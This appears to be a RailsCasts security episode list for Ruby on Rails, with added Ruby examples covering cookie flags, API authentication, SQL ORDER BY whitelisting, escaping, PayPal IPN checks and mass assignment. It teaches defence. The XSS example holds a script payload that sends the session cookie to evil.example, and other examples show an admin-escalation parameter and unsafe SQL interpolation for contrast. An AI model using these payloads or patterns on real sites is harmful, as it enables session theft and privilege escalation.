Security
Brakeman
The Brakeman gem will scan the Ruby code of a Rails application and alert you to common security vulnerabilities.
(8 minutes)
Dangers of Session Hijacking
If a user's authentication cookie is sent over an insecure connection, it is vulnerable to session hijacking, or more specifically sidejacking: anyone who can observe the plain-HTTP traffic copies the cookie and replays it to act as that user. Learn how this is done, and how you can prevent it.
(6 minutes)
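An added example, not the episode's own code: a small Ruby check that parses a Set-Cookie header, reports the flags that decide whether the session cookie can be sidejacked, and models the browser rule that a cookie carrying the Secure attribute is only attached to HTTPS requests. The cookie name _app_session and both sample headers are constructed for the demo.

```ruby
# Added example (not from the RailsCasts episode). Parses a Set-Cookie header,
# reports the flags that matter for sidejacking, and models the browser's
# decision of whether to send the cookie on a plain-HTTP request.
# The cookie name "_app_session" and the sample headers are constructed.

# Parse one Set-Cookie header into its name, value and attribute hash.
# Attributes without a value (Secure, HttpOnly) are stored as true.
def parse_set_cookie(header)
  pair, *attrs = header.split(";").map(&:strip)
  name, value = pair.split("=", 2)
  flags = {}
  attrs.each do |attr|
    k, v = attr.split("=", 2)
    flags[k.downcase] = v.nil? ? true : v
  end
  { name: name, value: value, flags: flags }
end

# Findings a reviewer would raise for a session cookie: without Secure the
# browser replays it over HTTP (sidejacking); without HttpOnly a script
# injected through XSS can read it and ship it off-site.
def cookie_findings(header)
  cookie = parse_set_cookie(header)
  findings = []
  findings << "no Secure flag: cookie is sent over plain HTTP" unless cookie[:flags]["secure"]
  findings << "no HttpOnly flag: readable from JavaScript" unless cookie[:flags]["httponly"]
  findings
end

# Browser rule: a cookie with the Secure attribute is only sent over HTTPS.
def browser_sends_cookie?(header, scheme)
  cookie = parse_set_cookie(header)
  return true unless cookie[:flags]["secure"]
  scheme == "https"
end

# Constructed sample headers: the weak default beside the hardened form.
WEAK_COOKIE     = "_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkki; path=/"
HARDENED_COOKIE = "_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkki; path=/; Secure; HttpOnly"

if __FILE__ == $PROGRAM_NAME
  p cookie_findings(WEAK_COOKIE)
  p browser_sends_cookie?(WEAK_COOKIE, "http")      # true: replayable by a sniffer
  p browser_sends_cookie?(HARDENED_COOKIE, "http")  # false: never leaves over HTTP
end
```

In a Rails app the hardened header comes from serving the whole site over HTTPS; from Rails 3.1 `config.force_ssl = true` redirects HTTP requests and marks the session cookie Secure, and the session store accepts `secure: true` and `httponly: true` options directly.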
Securing an API
There are many approaches to locking down an API. Here I start off with HTTP Basic authentication then move on to generating a unique token which can be passed through a URL parameter or HTTP header.
(7 minutes)
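An added example, not the episode's code: both schemes the episode moves through, HTTP Basic and a per-user token, checked against a Rack-style env hash so it runs without Rails. The user store, the "Token token=..." header format and the api_key query parameter are assumptions for the demo.

```ruby
require "base64"
require "openssl"
require "uri"

# Added example (not from the RailsCasts episode). Two ways to authenticate an
# API request from a Rack env: HTTP Basic, then a generated per-user token sent
# either in the Authorization header or as a query parameter.
# The USERS store, the header format and the "api_key" parameter are assumptions.
USERS = {
  "alice" => { password: "correct horse battery staple",
               token: "f0a2c1d9e8b7a6c5d4e3f2a1b0c9d8e7" }
}.freeze

# Constant-time comparison. Hashing both sides first gives equal lengths, so
# neither the length nor the position of the first mismatch leaks through timing.
def secure_compare(a, b)
  da = OpenSSL::Digest::SHA256.digest(a.to_s)
  db = OpenSSL::Digest::SHA256.digest(b.to_s)
  da.bytes.zip(db.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# HTTP Basic: "Authorization: Basic base64(user:password)".
def basic_auth_user(env)
  header = env["HTTP_AUTHORIZATION"].to_s
  return nil unless header.start_with?("Basic ")
  user, pass = Base64.decode64(header.sub("Basic ", "")).split(":", 2)
  record = USERS[user]
  record && secure_compare(record[:password], pass) ? user : nil
end

# Token: "Authorization: Token token=..." first, ?api_key=... as the fallback.
def token_auth_user(env)
  token = env["HTTP_AUTHORIZATION"].to_s[/\AToken token=(\S+)/, 1]
  token ||= URI.decode_www_form(env["QUERY_STRING"].to_s).to_h["api_key"]
  return nil if token.nil? || token.empty?
  USERS.find { |_, record| secure_compare(record[:token], token) }&.first
end

# Returns the authenticated user name, or nil when neither scheme matches.
def authenticate(env)
  basic_auth_user(env) || token_auth_user(env)
end
```

A token passed as a URL parameter ends up in server logs, proxy logs and Referer headers; accept it there only if a client genuinely cannot set headers, and prefer the header form otherwise.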
Dynamic attr_accessible
It is important to use attr_accessible for security with mass assignment, but what if you need it to be dynamic based on user permissions? See how in this episode.
(9 minutes)
Sortable Table Columns
Here I walk you through adding the ability to sort table columns in ascending or descending order by clicking the header.
(10 minutes)
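An added example, not the episode's code, showing why this episode sits under Security: a column name cannot be bound as a query parameter, so whatever reaches ORDER BY is interpolated into the SQL string and must be whitelisted. The column list and the default column are assumptions.

```ruby
# Added example (not from the RailsCasts episode). The sort column and direction
# come from the query string and end up inside ORDER BY, where they cannot be
# bound as parameters, so both are restricted to known values.
# The column list and the "name" default are assumptions.
SORTABLE_COLUMNS = %w[name price released_at].freeze

# Only a column from the whitelist is used; anything else falls back to the default.
def sort_column(params)
  SORTABLE_COLUMNS.include?(params["sort"]) ? params["sort"] : "name"
end

def sort_direction(params)
  %w[asc desc].include?(params["direction"]) ? params["direction"] : "asc"
end

# The clause a controller would pass to .order(...).
def order_clause(params)
  "#{sort_column(params)} #{sort_direction(params)}"
end

# The unsafe version, for contrast: the client's string goes straight into SQL.
def unsafe_order_clause(params)
  "#{params['sort']} #{params['direction']}"
end

# View helper: clicking the active column's header flips the direction.
def next_direction(params, column)
  params["sort"] == column && params["direction"] == "asc" ? "desc" : "asc"
end
```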
XSS Protection in Rails 3
It is easy to be vulnerable to cross site scripting attacks in earlier versions of Rails, but Rails 3 solves this by automatically escaping strings rendered in views unless they are explicitly marked as HTML-safe.
(8 minutes)
7 Security Tips
Security is important! Here I show seven different security flaws which are common to Rails applications ranging from mass assignment to CSRF protection.
(14 minutes)
PayPal Security
This episode shows how to encrypt the variables passed to PayPal and verify the authenticity of the payment notifications (IPN).
(11 minutes)
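An added example, not the episode's code, for the IPN half of the episode: the notification is posted back to PayPal unchanged with cmd=_notify-validate, and only a VERIFIED reply counts. The HTTP poster is injectable so the check runs offline; the sample notification is constructed, and the postback host is an assumption to confirm against PayPal's current documentation. The encryption half (signing and encrypting the button variables with OpenSSL::PKCS7) is not shown here.

```ruby
require "net/http"
require "uri"

# Added example (not from the RailsCasts episode). Verifies a PayPal IPN by
# posting it back with cmd=_notify-validate, then checks the fields that an
# attacker can still get wrong when the message itself is genuine.
# PAYPAL_VALIDATE_URL is an assumption; the sample notification is constructed.
PAYPAL_VALIDATE_URL = "https://ipnpb.paypal.com/cgi-bin/webscr"

# Default poster: the real round trip to PayPal, returning the response body.
DEFAULT_POSTER = lambda do |body|
  uri = URI(PAYPAL_VALIDATE_URL)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = true
  http.post(uri.path, body, "Content-Type" => "application/x-www-form-urlencoded").body
end

# Step 1: PayPal answers VERIFIED only when the exact raw body it sent comes back.
def ipn_verified?(raw_body, poster: DEFAULT_POSTER)
  poster.call("cmd=_notify-validate&#{raw_body}") == "VERIFIED"
end

# Step 2: a VERIFIED message can still be addressed to someone else's account,
# for a different amount or currency, not yet completed, or a replay.
def accept_ipn?(raw_body, receiver_email:, expected_amount:, currency:,
                seen_txn_ids:, poster: DEFAULT_POSTER)
  return false unless ipn_verified?(raw_body, poster: poster)
  p = URI.decode_www_form(raw_body).to_h
  return false unless p["receiver_email"] == receiver_email
  return false unless p["payment_status"] == "Completed"
  return false unless p["mc_currency"] == currency
  return false unless p["mc_gross"] == format("%.2f", expected_amount)
  return false if seen_txn_ids.include?(p["txn_id"])   # replayed notification
  seen_txn_ids << p["txn_id"]
  true
end

# Constructed notification body (not a real PayPal message).
SAMPLE_IPN = "txn_id=8AB12345CD678901E&payment_status=Completed&mc_gross=19.99" \
             "&mc_currency=USD&receiver_email=shop%40example.com&custom=order-42"

# Offline stand-in for PayPal: only the untouched sample is VERIFIED.
FAKE_POSTER = ->(body) { body == "cmd=_notify-validate&#{SAMPLE_IPN}" ? "VERIFIED" : "INVALID" }
```

In production `seen_txn_ids` is a database column with a uniqueness constraint, not an array; the point is that the txn_id check happens before the order is marked paid.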
Cross Site Scripting
Another common security issue is cross site scripting. In this episode you will see why it is so important to escape any HTML a user may submit.
(5 minutes)
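An added example serving both this episode and "XSS Protection in Rails 3" above; it is not the episodes' code. It reduces the Rails 3 rule to a few lines: output is a safe buffer, anything appended to it is escaped unless it was explicitly marked html_safe, and the Rails 2 style helper is kept beside it to show what happens when escaping is left to the author. The hostile comment and the template are constructed.

```ruby
require "cgi"

# Added example (not from the RailsCasts episodes). A minimal version of the
# Rails 3 SafeBuffer rule: any string appended to the output is escaped unless
# it has been marked html_safe. The comment text and the template are constructed.
class SafeBuffer < String
  def html_safe?
    true
  end

  # Appending: pass safe strings through, escape everything else.
  def <<(other)
    safe = other.respond_to?(:html_safe?) && other.html_safe?
    super(safe ? other : CGI.escapeHTML(other.to_s))
  end
  alias concat <<
end

class String
  # A plain String is untrusted by default.
  def html_safe?
    false
  end

  # Explicit opt-in, as Rails' html_safe; use only on markup you generated yourself.
  def html_safe
    SafeBuffer.new(self)
  end
end

# Rails 2 style: the template author must remember h(), or the script runs.
def render_comment_unescaped(body)
  "<p class=\"comment\">#{body}</p>"
end

# Rails 3 style: the buffer starts safe, and user text is escaped on the way in
# whether or not the author remembered.
def render_comment(body)
  out = SafeBuffer.new
  out << "<p class=\"comment\">".html_safe
  out << body
  out << "</p>".html_safe
  out
end

# Constructed hostile input: a comment that ships the session cookie off-site.
ATTACK = %q{<script>document.location="http://evil.example/?c="+document.cookie</script>}
```

The caveat that survives into Rails 3: calling html_safe (or raw) on user-supplied text switches the protection off for that string, so every html_safe call in a code base is a place to audit.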
Hackers Love Mass Assignment
Your site may be at risk! When using mass assignment, you are giving the user control over every attribute of that model, and its associations, that you have not explicitly protected. See how a hacker might use this vulnerability and learn how to stop it in this episode.
(6 minutes)
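An added example serving both this episode and "Dynamic attr_accessible" above; it is not the episodes' code. A plain-Ruby model shows the unprotected assignment an attacker exploits by adding user[admin]=1 to a form post, the whitelist that stops it, and a whitelist that varies with the assigning user's role, which is one way to make attr_accessible dynamic. The User model, its columns and the roles are assumptions.

```ruby
# Added example (not from the RailsCasts episodes). A plain-Ruby model with the
# attr_accessible rule the episodes describe, extended with per-role attribute
# lists so the whitelist depends on who is assigning.
# The User model, its columns and the roles are assumptions.
class User
  ATTRIBUTES = %i[name email admin].freeze
  attr_accessor(*ATTRIBUTES)

  # Role-based whitelist: the equivalent of attr_accessible with an :as role.
  ACCESSIBLE = {
    default: %i[name email],
    admin:   %i[name email admin]
  }.freeze

  def initialize
    @admin = false
  end

  # The vulnerable form: every submitted column becomes a setter call, so
  # user[admin]=1 in the POST body promotes the account.
  def unsafe_assign(params)
    params.each { |k, v| public_send("#{k}=", v) if ATTRIBUTES.include?(k.to_sym) }
    self
  end

  # The hardened form: keys outside the role's whitelist are dropped
  # (Rails logs them; raise here if you would rather fail loudly).
  def assign_attributes(params, as: :default)
    allowed = ACCESSIBLE.fetch(as)
    params.each do |k, v|
      next unless allowed.include?(k.to_sym)
      public_send("#{k}=", v)
    end
    self
  end

  # Form posts arrive as strings, so treat "1"/"true" the way a boolean column would.
  def admin?
    [true, 1, "1", "true"].include?(@admin)
  end
end

# Constructed attacker request: the form only had name and email fields, but
# nothing stops a client from adding user[admin]=1 to the body.
HOSTILE_PARAMS = { "name" => "Mallory", "email" => "m@example.com", "admin" => "1" }.freeze
```

The role passed as `as:` must come from the current session, never from the request parameters, or the attacker simply adds the role to the same post.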